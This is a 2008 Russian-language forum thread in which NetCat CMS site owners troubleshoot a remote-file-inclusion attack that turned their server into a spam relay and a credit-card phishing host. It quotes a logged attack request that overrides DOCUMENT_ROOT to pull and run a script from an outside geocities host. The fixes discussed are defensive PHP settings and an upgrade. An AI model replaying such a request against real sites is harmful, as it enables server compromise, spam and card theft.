|
|
08.07.2008, 10:17
|
|
Гость
Гость
|
Все привет!
Давеча обнаружил что кто то шлет 200 тыс. писем спама через один сайт на сервере. Сначала подумал что это бот спамит через форму обратной связи (несмотря на капчу). Проверив и отключив раздел выяснил что поток писем валится дальше. Решил проверить access.log апача и увидел сотни вот таких запросов с разных IP.
41.219.222.173 - - [08/Jul/2008:09:59:45 +0400] "POST //index.php?_SERVER%5bDOCUMENT_ROOT%5d=http://geocities.com/abugag/inbox.txt? HTTP/1.1" 404 22666 "http://www.мойдомен.ru//index.php?_SERVER%5bDOCUMENT_ROOT%5d=http://geocities.com/abugag/inbox.txt?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
Т. е. видно что через подмену DOCUMENT_ROOT выполняется код //index.php + на чужом серваке - http://geocities.com/abugag/inbox.txt
Кто нить знает как решить проблему?
|
|
|
08.07.2008, 12:10
|
|
DiGGy
DiGGy
Зарегистрирован:
2005-04-04
Сообщений: 1546
|
сдается мне, что Вы давно движок не обновляли... сидите нибусь на версии 2.3
Temet nosce...
|
|
|
09.07.2008, 09:28
|
|
Гость
Гость
|
Да - данная проблема обнаруживается на Lite и Small Business.
Никто не знает до какой версии нужно обновить чтоб решить проблему?
Или какой скрипт исправить.
|
|
|
09.07.2008, 10:46
|
|
DiGGy
DiGGy
Зарегистрирован:
2005-04-04
Сообщений: 1546
|
в файл vars.inc.php добавьте строки:
Код:
$DOCUMENT_ROOT = getenv("DOCUMENT_ROOT");
$HTTP_HOST = getenv("HTTP_HOST");
или укажите значение переменной $DOCUMENT_ROOT явным образом
Temet nosce...
|
|
|
09.07.2008, 16:54
|
|
Гость
Гость
|
Директивы прописал, явным образом документ рут оже.
Никакого эффекта - также прет спам. :-(
Интересно что еще может быть такое?
|
|
|
10.07.2008, 10:51
|
|
DiGGy
DiGGy
Зарегистрирован:
2005-04-04
Сообщений: 1546
|
Попробуйте обновиться до версии 2.4 лайт. Там добавлен скрипт s_extract.inc.php, который как раз должен вычищать лишний мусор из REQUEST_URI.
Попробуйте поиграться с настройками параметров mail см. тут. Может стоит временно отключить возможность отправки писем.
Temet nosce...
|
|
|
14.07.2008, 10:42
|
|
sdelali
Сделали.Ру
Зарегистрирован:
2004-12-24
Сообщений: 24
|
DiGGy писал(а):Попробуйте обновиться до версии 2.4 лайт. Там добавлен скрипт s_extract.inc.php, который как раз должен вычищать лишний мусор из REQUEST_URI.
А есть вообще в природе такой патч? Если есть - то где взять (Лайт и SB больше не выпускаются вроде).
Попробовал прописать в connect_io.php строку:
include_once $INCLUDE_FOLDER."s_extract.inc.php";
и s_extract.inc.php положить от NetCat 3 - тоже не сработало
счас попробуем от Lite
может где еще есть запросы к s_extract?
Сделали.Ру
|
|
|
14.07.2008, 17:22
|
|
sdelali
Сделали.Ру
Зарегистрирован:
2004-12-24
Сообщений: 24
|
Посоветовали так:
Для PHP4 ставим в php.ini:
allow_url_fopen = Off
Для PHP5 ставим в php.ini:
allow_url_fopen = Off
и/или
allow_url_include = Off
Можно к этому добавить еще
safe_mode = On
Но прежде всего (я так полагаю, что включены "глобальные") выключить:
register_globals = Off
Т. е. allow_url_fopen = Off в моем случае решило проблему
но все равно проблема в NetCat - как там обновляться и куда непонятно
Сделали.Ру
|
|
|
14.07.2008, 17:50
|
|
Pavel
Зарегистрирован:
2007-10-20
Сообщений: 55
|
письмо от хостера:
Цитата:на Вашем сайте была размещена мошенническая система
сбора информации о кредитных картах. Файлы этой системы были размещены
на Вашем сайте при помощи установленного у Вас index.php.
Злоумышленники использовали возможность работать с объектами URL, как
с обычными файлами, всвязи с чем эту возможность нам пришлось
отключить:
allow_url_fopen = off
NC 2.2 Small Business - что посоветуете?
|
|
|
14.07.2008, 19:28
|
|
DiGGy
DiGGy
Зарегистрирован:
2005-04-04
Сообщений: 1546
|
Советую обновиться до 2.4. Скачать ее можно из личного кабинета (наверное...) Или купить за 360р. Если Вы не являетесь диллером и никак не можете ее купить, то могу Вам ее перепродать. Мои контакты тут
Temet nosce...
|
|
|
15.07.2008, 11:43
|
|
Pavel
Зарегистрирован:
2007-10-20
Сообщений: 55
|
allow_url_fopen = off
влияет как то на функционаьность?
|
